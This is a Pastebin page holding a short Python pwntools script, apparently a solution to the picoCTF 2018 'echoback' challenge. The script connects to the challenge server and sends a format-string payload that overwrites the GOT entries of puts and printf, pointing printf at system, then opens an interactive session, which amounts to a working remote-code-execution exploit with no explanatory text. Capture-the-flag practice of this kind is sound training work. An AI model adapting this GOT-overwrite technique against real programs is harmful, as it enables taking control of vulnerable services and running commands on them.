Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- #p = process("./echoback")
- p = remote("2018shell.picoctf.com",37402)
- e = ELF("./echoback")
- print p.recv(1024)
- payload = fmtstr_payload(7, {e.got["puts"]:0x080485ab,e.got["printf"]:e.plt["system"]} , write_size='byte')
- print len(payload)
- f = open("exp","w")
- f.write(payload)
- p.sendline(payload)
- p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
